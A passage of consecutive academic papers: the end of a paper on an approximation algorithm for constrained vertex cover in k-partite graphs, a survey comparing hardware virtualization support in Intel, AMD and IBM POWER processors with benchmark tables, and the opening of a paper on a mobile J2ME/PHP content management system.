Approximation algorithms return solutions with a guarantee attached, namely that the optimal solution can never be much better than the given solution. Thus we can never go too far wrong in using an approximation algorithm: no matter what our input instance is and how lucky we are, we are doomed to do all right. Further, approximation algorithms realizing provably good bounds are often conceptually simple, very fast, and easy to program.

A. Algorithm for MIN-CVCK problem

In this section, we describe our proposed algorithm for minimum constrained vertex cover in k-partite graphs. It is an approximation algorithm for the MIN-CVCK problem. The procedure is described below.
Procedure MIN-CVCK (n, G, U, Count[], K[])
[ // n is the number of partitions, n ≥ 2
  // G is a given graph
  // U is the list of vertices in each partition
  // Count is an array containing how many vertices are in each partition
  // K is an array indicating that at most K[i] vertices may be taken from the i-th partition ]

    Integer a[], b[], part[], tmpU
    Struct EdgeList[]
    [ // a is a flag array tracking whether a vertex is selected or not used
      // a is initialized with "not used"
      // b is an integer array containing how many vertices are already used by each partition
      // b is initialized with 0
      // part is an array indicating the partition in which a vertex lies
      // EdgeList is an array of structures containing edges ]
    G' = G
    // Compute part array from U
    While (True) {
        tmpU = Extract_max(G')    // find a vertex of maximum degree (≥ 1) in G'
        If tmpU == NULL Then
            Break
        Else If b[part[tmpU]] + 1 > K[part[tmpU]] Then
            // here part[tmpU] is the partition where tmpU lies
            a[tmpU] = not selected
        Else
            a[tmpU] = selected
            b[part[tmpU]] = b[part[tmpU]] + 1
            EdgeList = NULL
            remove all the incident edges of tmpU from G' and add those edges to EdgeList
            If Make_decision(G') == False Then
                a[tmpU] = not selected
                b[part[tmpU]] = b[part[tmpU]] - 1
                add the edges in EdgeList back to G'
            End If
    } // End_While
// End_Procedure_MIN-CVCK

Procedure node_type Extract_max(G)
{
    Max = 0, MaxDegVertex = NULL
    for each vertex u in V[G]
        if a[u] == not used and degree[u] > Max Then
            MaxDegVertex = u
            Max = degree[u]
    return MaxDegVertex
} // End_Procedure_Extract_max

Procedure boolean Make_decision(G)
{
    Set S = NULL    // S is a set of vertices
    For i = 1 to (number of partitions in G)
        Select none or up to K[P[ord[i]]] − b[P[ord[i]]] vertices which are not used from the i-th partition and add them to S, where every selected vertex is incident on at least one non-visited edge and on more non-visited edges than the vertices not selected. Mark all edges incident on a selected vertex as visited.
        [ // ord is an array containing partition numbers such that
          // K[P[ord[i]]] − b[P[ord[i]]] ≥ K[P[ord[i+1]]] − b[P[ord[i+1]]] for all i < k ]
    If there exists at least one edge in G not incident on some vertex u ∈ S then
        return False
    End If
    Return True
} // End_Procedure_Make_decision
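To make the selection loop concrete, here is a simplified Python sketch of the greedy core of MIN-CVCK. It is our own simplification of the pseudocode above: it repeatedly selects a maximum-degree unused vertex whose partition quota K[p] is not exhausted, and omits the Make_decision feasibility check and the backtracking of the full procedure:

```python
def min_cvck_greedy(adj, part, K):
    """Greedy core of MIN-CVCK (simplified sketch): repeatedly take
    the highest-degree vertex whose partition quota is not exhausted.
    adj: {vertex: set of neighbours}; part: vertex -> partition id;
    K: partition id -> maximum vertices allowed from that partition."""
    live = {u: set(vs) for u, vs in adj.items()}  # working copy of G'
    used = {p: 0 for p in K}                      # the b[] counters
    cover = []
    while True:
        # candidates: vertices with remaining edges and remaining quota
        candidates = [u for u in live
                      if live[u] and used[part[u]] < K[part[u]]]
        if not candidates:
            break
        u = max(candidates, key=lambda v: len(live[v]))  # Extract_max
        cover.append(u)
        used[part[u]] += 1
        for v in live[u]:          # delete edges incident on u
            live[v].discard(u)
        live[u] = set()
    return cover
```

Unlike the full procedure, this sketch never un-selects a vertex, so it may stop with uncovered edges when the quotas are tight; it is meant only to illustrate the main loop.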
B. Complexity Analysis

Here we define the complexity of our proposed CVCK algorithm. Let us be given a graph G = (V, E) with k partitions, where |V| = n.

For the average case we get the complexity:

(n − 1){logn + (n − 1) + (n − 1) + k + k(n − 1)}
=> (n − 1)logn + 2(n − 1)² + (n − 1)k + k(n − 1)²
=> (n − 1)²(2 + k) + (n − 1)(k + logn) . . . . . . . . (i)

Complexity for the best case: when k = 2, from equation (i) we get

(n − 1)²(2 + 2) + (n − 1)(2 + logn)
=> 4(n − 1)² + (n − 1)(2 + logn)
=> O(n²) + O(nlogn)
=> O(n²)

Complexity for the worst case: when k = n, from equation (i) we get

(n − 1)²(2 + n) + (n − 1)(n + logn)
=> O(n³) + O(n²) + O(nlogn)
=> O(n³)

Hence, we have shown that the time complexity of the above CVCK approximation algorithm is O(n²) (rising to O(n³) in the worst case, when k = n). The following table summarizes some known results for vertex cover problems.

Table 5.1: Complexity of some vertex cover problems

Problem                                             | Time                            | Reference
Vertex Cover Problem                                | O(kn + 1.2852^k)                | Jianer Chen, Iyad A. Kanj & Weijia Jia [3]
Constrained minimum vertex cover in bipartite graph | O(1.26^(ku+kl) + (ku + kl)|G|)  | Jianer Chen & Iyad A. Kanj [2]
Constrained bipartite vertex cover (exact)          | O(1.40^k + kn)                  | H. Fernau & R. Niedermeier [4]
Constrained minimum vertex cover in k-partite graph | O(n²)                           | Ours

VI. CONCLUSION

Most theoretical computer scientists believe that the NP-complete problems are intractable. The reason is that if any single NP-complete problem could be solved in polynomial time, then every NP-complete problem would have a polynomial-time algorithm. In this research, we show that the minimum vertex covering for k-partite graphs is NP-complete. There are some limitations, as our approximation algorithm is efficient for about 80% of graphs: i) if the graph can be drawn as a tree, then our algorithm gives a minimum + 1 solution for it; ii) there may be no solution or output for a very complex graph. Now, some of the open problems are as follows:

1. What is the complexity of constrained minimum vertex cover in k-partite graphs?
2. Is it possible to reduce the complexity of the approximation algorithm for this problem from O(n²) to O(nlogn) or less?

A. Future Work

Is it possible to develop a perfect algorithm for maximum matching in k-partite graphs? If it becomes possible, then it will be easier to solve this type of NP-Complete problem. Is it possible to prove that vertex cover in k-partite graphs with node capacities (i.e., each node has its own cost) is NP-Complete? Is there any polynomial algorithm for constructing a k-partite graph from a general graph?

VII. REFERENCES

[1] G. Bai and H. Fernau, "Constraint Bipartite Vertex Cover: Simpler Exact Algorithms and Implementations", Frontiers in Algorithmics, Springer, ISSN 1611-3349, pp. 67-68, 2008.
[2] J. Chen and I. A. Kanj, "Constrained minimum vertex cover in bipartite graphs: complexity and parameterized algorithms", Journal of Computer and System Sciences, 67 (2003), pp. 833-847.
[3] J. Chen, I. A. Kanj and W. Jia, "Vertex Cover: Further Observations and Further Improvements", Journal of Algorithms, 41 (2001), pp. 280-301.
[4] H. Fernau and R. Niedermeier, "An efficient exact algorithm for constrained bipartite vertex cover", Lecture Notes in Computer Science 1672 (MFCS'99), 1999, pp. 387-397.
[5] M. R. Garey and D. S. Johnson, Computers and Intractability: A Guide to the Theory of NP-Completeness, W. H. Freeman and Co., New York, 1979.
[6] S. S. Skiena, The Algorithm Design Manual, Springer Science+Business Media, ISBN: 978-1-84800-070-4, 2nd Edition, pp. 156-157, 218.
[7] Lu Xuemiao, "On the complexity of induction of structural descriptions", Journal of Computer Science and Technology, Vol. 2, ISSN: 1860-4749, Springer, September 2008.
[8] http://knowledgerush.com/kr/encyclopedia/, Last Checked: 30-07-2009.
[9] http://mathworld.wolfram.com/, Last Checked: 30-07-2009.

Kamanashis Biswas, born in 1982, post graduated from Blekinge Institute of Technology, Sweden in 2007. His field of specialization is Security Engineering. At present, he is working as a Lecturer in Daffodil International University, Dhaka, Bangladesh.

S.A.M. Harun graduated from International Islamic University Chittagong. He is a programmer and ACM problem setter. Now he is working as a project manager in a software company. His major area of interest is developing efficient algorithms.
HARDWARE VIRTUALIZATION SUPPORT IN
INTEL, AMD AND IBM POWER PROCESSORS
Kamanashis Biswas
Computer Science and Engineering Department
Daffodil International University
102, Shukrabad, Dhaka-1207, Bangladesh
ananda@daffodilvarsity.edu.bd
Md. Ashraful Islam
Department of Business Administration
Bangladesh Islami University
Gazaria Tower, 89/12, R. K. Mission Road, Dhaka-1203
ashraful47@yahoo.com
ABSTRACT – At present, the most widely used and developed mechanism is hardware virtualization, which provides a common platform to run multiple operating systems and applications in independent partitions. More precisely, it is all about resource virtualization, as the term 'hardware virtualization' emphasizes. In this paper, the aim is to find out the advantages and limitations of current virtualization techniques, analyze their cost and performance, and also depict which forthcoming hardware virtualization techniques will be able to provide efficient solutions for multiprocessor operating systems. This is done by making a methodical literature survey and statistical analysis of the benchmark reports provided by SPEC (Standard Performance Evaluation Corporation) and TPC (Transaction Processing Performance Council). Finally, this paper presents the current aspects of hardware virtualization, which will help the IT managers of large organizations to take effective decisions while choosing servers with virtualization support. Again, the future work described in section 4 of this paper focuses on some real-world challenges such as abstraction of multiple servers, language-level virtualization, pre-virtualization etc., which may be points of great interest for researchers.
Keywords: Hardware Virtualization, Paravirtualization, Virtual Machine Monitor, Hypervisor, Binary Translation, Xen, Denali.
1. INTRODUCTION
A current trend in the computer industry is replacing uniprocessor computers with small multiprocessors [11]. Traditionally, most small multiprocessors have been SMPs (Symmetric Multiprocessors) with two or more processor chips where each processor has equal access to memory and hardware devices. But now the scenario is changing, and manufacturers are trying to increase PC manageability, user productivity and so on. Many techniques already exist to support multiprocessor operating systems, such as giant locking, asymmetric approaches, virtualization, K42 etc.

There are two approaches which are used for parallelized processors. First, simultaneous multithreading (SMT) [3], where two or more concurrently running program threads share processor resources, e.g. the Intel Pentium 4 and Xeon processors [12], and the 2-way multithreaded Sony/IBM Cell processor. The second is chip multiprocessors (CMPs) [5], which partition the chip area into two or more mostly independent processor cores; e.g., the IBM POWER4 architecture was released as a dual-core chip in 2001 [8].
However, to implement multiprocessor operating systems and provide a dynamic environment, many technologies have evolved. But the most common and continuously updated technology is virtualization, as companies like Intel, AMD and IBM keep their focus on this area by developing ever newer virtualization techniques. Generally, virtualization is the faithful reproduction of an entire architecture in software which provides the illusion of a real machine to all software running above it [10]. Precisely, virtualization is a framework or methodology of dividing the resources of a computer into multiple execution environments, by applying one or more concepts or technologies such as hardware and software partitioning, time-sharing, partial or complete machine simulation, emulation, quality of service, and many others. It can be applied by software or hardware or both, and to desktop computers as well as server machines.
In the software-only virtualization technique, a Virtual Machine Monitor (VMM) program is used to distribute resources to the current multiple threads. But this software-only virtualization solution has some limitations. One is the allocation of memory space by guest operating systems where applications would conventionally run. Another problem is binary translation, i.e., the necessity of an extra layer of communication for binary translation in order to emulate the hardware environment by providing interfaces to physical resources such as processors, memory, storage, graphics cards, and network adapters [16]. So the hardware virtualization technique, which works in cooperation with the VMM, is a good solution to the above problems. This virtualization technique provides a new architecture upon which the operating system can run directly, removing the need for binary translation. Thus, increased performance and supportability are ensured. It also enhances the reliability, supportability, security, and flexibility of virtualization solutions. So the keen interest is in hardware virtualization.

This paper focuses on the virtualization support of current microprocessors and makes a comparison among various hardware virtualization techniques offered by various companies. As there are many companies in the market competing with their latest technologies and improved facilities, it is important to have a good understanding of the mechanisms they are using. However, hardware virtualization is raising its acceptability over other virtualization techniques as it provides transparency, legacy
support, simplicity, monitoring facilities and security, which are the points of interest for industrial computing systems.
II. DIFFERENT VIRTUALIZATION TECHNIQUES
In a uniprocessor system, it is often assumed that only one process is in the kernel. As a result, the kernel instructions are simplified and cross-process locks are not required. But the scenario changes when multiple processors execute in the kernel: adding SMP support changes the original operating system. Hence, mechanisms for supporting multiprocessor operating systems are required. There are different ways of organizing a multiprocessor operating system, such as giant locking, coarse-grained locking, fine-grained locking, asymmetric approaches, virtualization, and API/ABI compatibility and reimplementation. But the virtualization technique is the important one, as developers are continuously upgrading this technology. At first, we describe software-only virtualization and hardware virtualization. Then paravirtualization and full virtualization are explained.
A. SOFTWARE ONLY VIRTUALIZATION
In the software-only virtualization technique, the concept of a 2-bit privilege level is used: 0 for the most privileged software and 3 for the least privileged. In this architecture (IA-32 and Itanium), the guest operating systems each communicate with the hardware through the Virtual Machine Monitor (VMM), which must mediate access for all virtual machines on the system. Thus, the virtual machine can run in non-privileged mode, i.e., non-privileged instructions can be executed directly without involving the VMM. But some problems arise in the software-only solution. Firstly, ring aliasing: problems that arise when software is run at a privilege level other than the level for which it was written. Secondly, address-space compression: this occurs when guest software tries to access the VMM's portion of the guest's virtual address space. Thirdly, impacts on guest transitions: an operation may cause a transition to the VMM and not to the guest operating system. VMMs also face other technical challenges such as the use of private memory for VMM use only, VMM interrupt handling, hidden state access, etc. [16].
B. HARDWARE VIRTUALIZATION
Hardware virtualization allows the VMM to run virtual machines in an isolated and protected environment. It is also transparent to the software running in the virtual machine, which thinks that it is in exclusive control of the hardware. In 1999, VMware introduced the hosted VMM, which was capable of extending a modern operating system to support a virtual machine that acts and runs like the hardware-level VMMs of old [14]. To address the problems of the software-only virtualization solution, the hardware virtualization mechanism is applied; this is possibly the most commonly known technology, including products from VMware and Microsoft's Virtual Server. Now VMMs can run off-the-shelf operating systems and applications without recourse to binary translation or paravirtualization. This capability greatly facilitates the deployment of VMMs and provides greater reliability and manageability of guest operating systems and applications.
C. PARAVIRTUALIZATION
Basically, to overcome the virtualization challenges of software-only virtualization, designers developed VMMs that modify guest software (source or binary). Denali and Xen are examples of VMMs that use source-level modifications in a technique called paravirtualization. Paravirtualization is similar to hardware emulation in that, in concept, it is designed to support multiple OSs. The only implementation of this technology today is the Xen open source project, soon to be followed by an actual product from XenSource. Paravirtualization provides high performance and eliminates changes to guest applications. But the disadvantage is that it supports a limited number of operating systems. For example, Xen cannot support an operating system that its developers have not modified, such as Microsoft Windows.
D. FULL VIRTUALIZATION
Full system virtualization provides a virtual replica of the system's hardware so that operating systems and software may run on the virtual hardware exactly as they would on the original hardware [13]. The first software introduced for full virtualization was CP-67, designed as a specialized time-sharing system which exposed to each user a complete virtual System/360 computer. Though full virtualization on PC architectures is extremely complex, it has been pioneered in the market since 1998, when VMware initiated x86-based virtualization, providing the fundamental technology for all leading x86-based hardware suppliers. It creates a uniform hardware image, implemented through software, on which both operating systems and application programs can run.
III. HARDWARE VIRTUALIZATION SUPPORT INMICROPROCESSORS
The challenges imposed on IT business that CIOs and IT managers always face are cost-effective utilization of IT infrastructure and flexibility in adapting to organizational changes. Hence, virtualization is a fundamental technological innovation that allows skilled IT professionals to organize creative solutions to those business challenges. The leading companies of the IT sector are also introducing their innovative and well-developed approaches every day to cope with the demands of the age. Again, hardware virtualization support is an important factor for the field of Grid Computing or secure on-demand cluster computing. The hardware support for virtualization in current microprocessors is addressed in this section.
A. INTEL HARDWARE SUPPORT
Intel is developing microprocessors with various advanced virtualization supports, updating its technologies constantly to meet users' demands. Starting with server and mainframe systems virtualization, Intel now provides hardware support for processor virtualization through virtual machine monitor software, also known as a hypervisor. The actual aim of using a hypervisor is to arbitrate access to the underlying physical host system's resources so that multiple operating systems that are guests of the VMM can share them. The IA-32 and Itanium architectures were built on software-only virtualization support [16]. But unfortunately they faced many challenges while providing virtualization support. The software cannot work properly in concert with the core hardware; that is why it has to use complex schemes to present hardware features to the software. Moreover, it has to maintain the illusion whereby the host operating system regards the virtual machine as just another application. To eliminate these problems, VMM designers developed new solutions like the Xen [2] and Denali VMMs that use source-level modification, known as paravirtualization. But the main limitation of this scheme is that it is applicable only to a certain number of operating systems. Hence Intel developed the new architectures VT-x and VT-i for IA-32 processors (Core Duo and Solo) and the Itanium processor family respectively, which offer full virtualization using hypervisor support. This new architecture enables the VMM to run off-the-shelf operating systems and applications without any binary translation or paravirtualization. As a result, it increases robustness, reliability and security.
B. AMD HARDWARE SUPPORT
AMD has introduced its Quad-Core AMD Opteron processor (based on the Pacifica specification), which is designed to provide optimal virtualization. The processor offers a number of features that enhance the performance and efficiency of virtualization support. First, AMD Opteron Rapid Virtualization Indexing allows virtual machines to manage memory more directly, improving performance for many virtualized applications [1]. It also decreases the "world-switch time", i.e., the time spent switching from one virtual machine to another. Second, AMD's Direct Connect Architecture provides direct CPU-to-memory, CPU-to-I/O, and CPU-to-CPU connections to streamline server virtualization. This makes it possible to host more VMs per server and to maximize the benefits of virtualization in terms of high bandwidth, low latency, and scalable access to memory. Third, the tagged Translation Look-aside Buffer (TLB) increases responsiveness in virtualized environments: through the tagged TLB, the AMD Opteron processor maintains a mapping to each VM's individual memory space, which eliminates additional memory-management overhead and reduces virtual-machine switching time. Finally, the Device Exclusion Vector (DEV) performs security checks in hardware rather than software, controlling access to virtual-machine memory based on permissions. These features have brought AMD to the front line of the battle over hardware virtualization support.
C. IBM HARDWARE SUPPORT
As the successor of POWER3 and POWER4, IBM introduced advanced virtualization capabilities in the POWER5 processor in 2004. This processor includes increased performance and other functional enhancements of virtualization, namely reliability, availability, and serviceability, at both the hardware and software levels [9]. It uses a hypervisor, the basis of IBM's virtualization technologies on POWER systems, which provides a fast page mover and simultaneous multithreading, extending the capability of POWER5. It supports logical partitioning and micro-partitioning: up to ten logical partitions (LPARs) can be created for each CPU, so the biggest 64-way system is able to run 256 independent operating systems. Memory, CPU power and I/O can be dynamically shifted between partitions. POWER5 thus uses paravirtualization, or cooperative partitioning, in conjunction with the AIX, i5/OS, and Linux operating systems, which offers minimal overhead [7]. This also ensures efficient resource utilization through recovery of idle processing cycles, dynamic reconfiguration of partition resources, consolidation of multiple operating systems on a single platform, and platform-enforced security and isolation between partitions.

The latest IBM processor with virtualization support is POWER6, billed as the world's fastest computer chip, with industry-leading virtualization capabilities. It provides a number of attractive features such as live partition mobility, expanded scalability, and dynamic reallocation of resources [6]. The Live Partition Mobility (LPM) feature allows clients to move running partitions automatically from one POWER6 server to another without powering down the server. Moreover, clients can create up to 160 virtual servers in a single box, giving ample capacity to run many different kinds of workloads (from large-scale database transactions to web servers) on the same server. IBM has built dynamic reallocation capabilities into the chip: users, or in some cases the chip itself, can reallocate and reassign computing resources within the shared environment. In addition to these exclusive features, POWER6 provides enhanced performance, increased flexibility, and application mobility.
IV. FUTURE CHALLENGES AND SUPPORTS
Though hardware virtualization support in current processors has resolved many problems, it may also provide new solutions to future challenges. Implementing virtualization at other levels of the software stack requires extending existing operating systems to present the abstraction of multiple servers. Language-level virtualization technologies may be introduced to provide language run-times that interpret and translate binaries compiled for abstract architectures, enabling portability; today Sun's Java and Microsoft's CLR VMs dominate the market for language-level virtualization technologies [4]. Memory virtualization should be efficient enough to accommodate frequent page-table changes. Moreover, research must look at the entire data-center level, and significant strides will surely be made in this area in the
coming decade. At present manual migration is the practice, but the future should bring a virtual machine infrastructure that automatically performs load balancing, detects impending hardware failures and migrates virtual machines accordingly, and creates and destroys virtual machines on demand. To facilitate this, instruction sets should be changed, or new instructions added, on which processors can perform these jobs. Moreover, besides full virtualization and paravirtualization, pre-virtualization is a new technique that claims to eliminate the guest-side engineering cost while matching the runtime performance of paravirtualization [17]. Virtualization will also be useful for industrial support, particularly for providing Grid services. Grid computing has gained prominence for its use in physics, mathematics and medicine, to name just a few applications [10], and grid or on-demand computing requires virtualization support to take advantage of this technology in shared computing environments.
V. DISCUSSION
This paper describes an important aspect of current computing systems, as the present trend is toward multiprocessor operating systems. The main objective of our study is to survey the current state of the hardware virtualization support provided by various companies. From our survey, we find that IBM provides the strongest hardware virtualization support, ensuring high availability, optimal system performance and efficiency. The most important feature of the IBM technology is the degree of user control over shared resources: POWER6 server clients can modify the memory and I/O configurations in real time, without downtime [6]. While IBM emphasizes load balancing and live partition mobility, AMD focuses on interconnect speed and performance: high-bandwidth, low-latency access to memory, high-throughput responsiveness for applications, and so on. Featuring AMD Virtualization technology with Rapid Virtualization Indexing and Direct Connect Architecture, Quad-Core AMD Opteron processors enable industry-leading virtualization platform efficiency [1]. Intel, the giant microprocessor manufacturer, improves on existing software-only virtualization solutions by enhancing the reliability, supportability, security and flexibility of virtualization, and is working on increased hardware virtualization support for both server and desktop computers. Table 5.1 on the next page summarizes some important features of Intel, AMD and IBM processors with virtualization support.
From the table, it is clear that IBM POWER6 is the most powerful machine, with enhanced virtualization capabilities; the microprocessor used in POWER6 runs at 4.7 GHz, among the fastest clock speeds ever shipped. Although IBM offers better output thanks to its robust hardware support for virtualization, it is more costly than Intel and AMD, and the greater degree of user interaction also opens a security hole, leaving the system more vulnerable to intruders. The virtualization technologies offered by Intel and AMD are not compatible with each other, but each offers similar functionality. These virtualization-friendly extensions to the x86 architecture essentially provide the foundation to maximize the efficiency and capabilities of software virtualization.
All microprocessor manufacturers are keen to enhance their virtualization capabilities, the main reason being that hardware virtualization reduces cost and provides reliability, availability and scalability. However, the concentration is more on servers than on desktop computers, as server machines require more processing capacity. Table 5.2 on the next page shows TPC benchmark results (www.tpc.org) for AMD, Intel and IBM systems with two server processors.
The table indicates that IBM POWER6 provides the best performance of all, and also carries the highest price. The POWER6 system can perform 404,462 transactions per minute versus 273,666 for Intel, while AMD achieves less than half of Intel's transactions per minute. In terms of price, the IBM POWER6 system costs almost four times as much as the Intel system, while the AMD system costs about the same as Intel's.
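The price/performance column of Table 5.2 is simply total system cost divided by tpmC, so the ratios quoted above can be re-derived from the table's raw figures. A quick sanity check (our own arithmetic on the published numbers; small differences from the table's column are rounding):

```java
public class TpcCheck {
    // Price/performance in USD per tpmC, as defined by the TPC-C metric.
    static double pricePerTpmC(double totalCostUsd, double tpmC) {
        return totalCostUsd / tpmC;
    }

    public static void main(String[] args) {
        System.out.printf("AMD:   %.2f%n", pricePerTpmC(338730, 113628));   // 2.98
        System.out.printf("Intel: %.2f%n", pricePerTpmC(376910, 273666));   // 1.38
        System.out.printf("IBM:   %.2f%n", pricePerTpmC(1417121, 404462));  // 3.50
        // Ratios quoted in the text:
        System.out.printf("IBM/Intel cost ratio: %.2f%n", 1417121.0 / 376910); // 3.76
        System.out.printf("AMD/Intel tpmC ratio: %.2f%n", 113628.0 / 273666);  // 0.42
    }
}
```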
Finally, the question is which forthcoming technology will overwhelm the others. The answer is that hardware-assisted virtualization techniques will dominate. From POWER5 onwards, IBM provides micro-partitioning and special technology for dynamic resource allocation. AMD Opteron introduces the tagged TLB and the Direct Connect Architecture, designed for dedicated memory access and efficient switching between virtual machines; the integrated memory controller of AMD Opteron also improves overall virtualization performance and efficiency. Most tellingly, Intel too has switched to hardware-assisted virtualization techniques starting with its Quad-Core Xeon 7400-series processors, which include Intel VT FlexPriority for interrupt handling and Virtual Machine Device Queues (VMDq) to offload the network I/O management burden, freeing processor cycles and improving overall performance. So there is no doubt that the next advance in hardware virtualization technology will be fully based on hardware-assisted techniques.
VI. CONCLUDING REMARKS
Some problems we faced during this study must be mentioned. First, achieving exact results would require access to the real hardware, which was not possible. Second, the SPEC results are not specific to virtualization support alone; they cover whole processors, of which the virtualization features are only a part, so the performance measurements take virtualization support only partly into consideration. The good news is that the Standard Performance Evaluation Corporation (SPEC) has created a working group to develop a set of industry-standard methods for comparing the performance of virtualization technologies; its current members include AMD, Dell, Fujitsu Siemens, Hewlett-Packard, Intel, IBM, Sun Microsystems, SWsoft (now Parallels) and VMware [15]. A sounder and more accurate conclusion must therefore wait a little longer, but this paper should provide a solid basis from which to explore hardware virtualization.
Table 5.1: Comparative view of Intel, AMD and IBM virtualization support based on SPEC evaluation [15].

| Characteristics | Intel Xeon 7000 Series Processors | AMD Opteron Processors | IBM POWER6 Processors |
| Hardware Assisted Virtualization | Intel Virtualization Technology (VT) | AMD-V with Rapid Virtualization Indexing | Live Partition Mobility (LPM) |
| Modular, Glueless Scalability | Requires Northbridge | Yes | Yes, supports up to 160 virtual servers |
| SMP Capabilities | Up to 4 Sockets / 16 Cores | Up to 8 Sockets / 32 Cores | Up to 8 Sockets / 16 Cores |
| User Interaction | No | No | Yes, user can create VMs which span the entire system |
| Server / Application Downtime | Yes | Yes | No, sustains system availability during maintenance or re-hosting |
| Concurrent Firmware and Operating System Updates | No | No | Yes, even when applications are active |
Table 5.2: TPC Benchmark results with price and performance (based on SPEC).

| Spec Revision | tpmC (transactions per minute) | Price/Performance | Total System Cost (USD) | Server CPU Type | Total Server CPUs | Total Server Processors | Total Server Cores | Total Server Threads |
| 5.6 | 113628 | 2.99 | 338730 | AMD Opteron (2.6 GHz) | 2 | 2 | 4 | 4 |
| 5.9 | 273666 | 1.38 | 376910 | Intel Quad-Core Xeon X5460 (3.16 GHz) | 2 | 2 | 8 | 8 |
| 5.8 | 404462 | 3.51 | 1417121 | IBM POWER6 (4.7 GHz) | 2 | 2 | 4 | 8 |
REFERENCES

1. AMD, "Product Brief: Quad-Core AMD Opteron Processor", http://www.amd.com/us-en/Processors/ProductInformation/0,,30_118_8796_15223,00.html, last checked: 24 October 2008.
2. P. Barham, B. Dragovic, K. Fraser, S. Hand, T. Harris, A. Ho, R. Neugebauer, I. Pratt and A. Warfield, "Xen and the Art of Virtualization", Proceedings of the Nineteenth ACM Symposium on Operating Systems Principles, ACM Press, October 2003.
3. S. J. Eggers, J. S. Emer, H. M. Levy, J. L. Lo, R. L. Stamm and D. M. Tullsen, "Simultaneous Multithreading: A Platform for Next-Generation Processors", IEEE Micro, 17(5):12-19, 1997.
4. R. Figueiredo, P. A. Dinda and J. Fortes, "Guest Editors' Introduction: Resource Virtualization Renaissance", IEEE Computer, 38(5):28-31, May 2005, ISSN 0018-9162.
5. L. Hammond, B. A. Nayfeh and K. Olukotun, "A Single-Chip Multiprocessor", IEEE Computer, 30(9):79-85, 1997.
6. IBM, "Fact Sheet: IBM POWER6 Virtualization", http://www-05.ibm.com/il/takebackcontrol/systemp/downloads/POWER6_Fact-Sheet-052507.pdf, last checked: 24 October 2008.
7. IBM, IBM Journal of Research and Development, http://www.research.ibm.com/journal/rd/494/armstrong.html, last checked: 24 October 2008.
8. J. Kahle, "POWER4: A Dual-CPU Processor Chip", Proceedings of the 1999 International Microprocessor Forum, San Jose, CA, October 1999.
9. R. Kalla, B. Sinharoy and J. M. Tendler, "IBM POWER5 Chip: A Dual-Core Multithreaded Processor", IEEE Micro, 24(2):40-47, March-April 2004, ISSN 0272-1732.
10. N. Kiyanclar, "A Survey of Virtualization Techniques Focusing on Secure On-Demand Cluster Computing", University of Illinois at Urbana-Champaign, National Center for Supercomputing Applications, 17 May 2006.
11. S. Kågström, L. Lundberg and H. Grahn, "The Application Kernel Approach: A Novel Approach for Adding SMP Support to Uniprocessor Operating Systems", 18th International Parallel and Distributed Processing Symposium, 2004, pp. 1-3.
12. D. Marr, F. Binns, D. L. Hill, G. Hinton, D. A. Koufaty, J. A. Miller and M. Upton, "Hyper-Threading Technology Architecture and Microarchitecture", Intel Technology Journal, 6(1):4-15, February 2002.
13. R. Rose, "Survey of System Virtualization Techniques", 8 March 2004, http://www.robertwrose.com/vita/rose-virtualization.pdf, last checked: 24 October 2008.
14. M. Rosenblum, "The Reincarnation of Virtual Machines", ACM Queue, Volume 2, 2004, ISSN 1542-7730, ACM Press, New York, USA.
15. SPEC, "SPEC Results 2006 (Processors)", http://www.spec.org/, last checked: 24 October 2008.
16. R. Uhlig, G. Neiger, D. Rodgers, A. L. Santoni, F. C. M. Martins, A. V. Anderson, S. M. Bennett, A. Kägi, F. H. Leung and L. Smith, "Intel Virtualization Technology", IEEE Computer, 38(5):48-56, May 2005.
17. J. LeVasseur, V. Uhlig, M. Chapman, P. Chubb, B. Leslie and G. Heiser, "Pre-Virtualization: Slashing the Cost of Virtualization", Technical Report 2005-30, Fakultät für Informatik, Universität Karlsruhe (TH), 30 November 2005.
__________________________________________________
Kamanashis Biswas, born in 1982, received his postgraduate degree from Blekinge Institute of Technology, Sweden, in 2007. His field of specialization is Security Engineering. At present he is working as a Senior Lecturer at Daffodil International University, Bangladesh.

Md. Ashraful Islam received his postgraduate degree from American Liberty University, UK. He is now working as an Assistant Professor at Bangladesh Islami University. His major areas of interest are software engineering, e-learning and MIS.
Dynamic Multimedia Content Retrieval System in
Distributed Environment
R. Sivaraman
Deputy Director, Center for Convergence of Technologies
Anna University Tiruchirappalli
Tiruchirappalli, India
e-mail: rs@tau.edu.in

R. Prabakaran
Lecturer, Department of Electrical and Electronics Engineering
Anna University Tiruchirappalli
Tiruchirappalli, India
e-mail: hiprabakaran@gmail.com

S. Sujatha
Lecturer, Department of Computer Science and Engineering
Anna University Tiruchirappalli
Tiruchirappalli, India
e-mail: ssujtha71@yahoo.co.in
Abstract— WiCoM enables remote management of web resources. Our application, Mobile Reporter, is aimed at journalists, who will be able to capture events in real time using their mobile phones and update their web server on the latest event. WiCoM has been developed using J2ME technology on the client side and PHP on the server side; the communication between the client and the server is established through GPRS. A mobile reporter is able to upload, edit and remove both textual and multimedia content on the server.

Keywords: wireless content management system; smart mobile device; J2ME; client-server architecture.
I. INTRODUCTION
A content management system (CMS) is a system used to manage the content of a Web site. Typically, a CMS consists of two elements: the content management application (CMA) and the content delivery application (CDA). The CMA element allows the content manager or author, who may not know Hypertext Markup Language (HTML), to manage the creation, modification, and removal of content from a Web site without needing the expertise of a Webmaster. The CDA element uses and compiles that information to update the Web site. The features of a CMS vary, but most include Web-based publishing, format management, revision control, and indexing, search, and retrieval.

The Web-based publishing feature allows individuals to use a template or a set of templates approved by the organization, as well as wizards and other tools, to create or modify Web content. The format management feature allows documents, including legacy electronic documents and scanned paper documents, to be formatted into HTML or Portable Document Format (PDF) for the Web site. The revision control feature allows content to be updated to a newer version or restored to a previous version; revision control also tracks any changes made to files by individuals. An additional feature is indexing, search, and retrieval: a CMS indexes all data within an organization, and individuals can then search for data using keywords, which the CMS retrieves.
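The revision-control behaviour just described can be captured in a few lines. A minimal illustrative sketch (the class and method names are our own, not taken from any CMS discussed here):

```java
import java.util.ArrayList;
import java.util.List;

// Sketch of CMS revision control: every update is kept, and any
// earlier version can be restored, which itself becomes a new version
// so the full change history survives.
public class VersionedContent {
    private final List<String> versions = new ArrayList<>();

    public void update(String newContent) { versions.add(newContent); }

    public String current() { return versions.get(versions.size() - 1); }

    public int versionCount() { return versions.size(); }

    // Restoring re-appends the old revision rather than truncating history.
    public void restore(int versionIndex) { versions.add(versions.get(versionIndex)); }

    public static void main(String[] args) {
        VersionedContent page = new VersionedContent();
        page.update("first draft");
        page.update("edited copy");
        page.restore(0);                          // roll back to the first draft
        System.out.println(page.current());       // first draft
        System.out.println(page.versionCount());  // 3
    }
}
```

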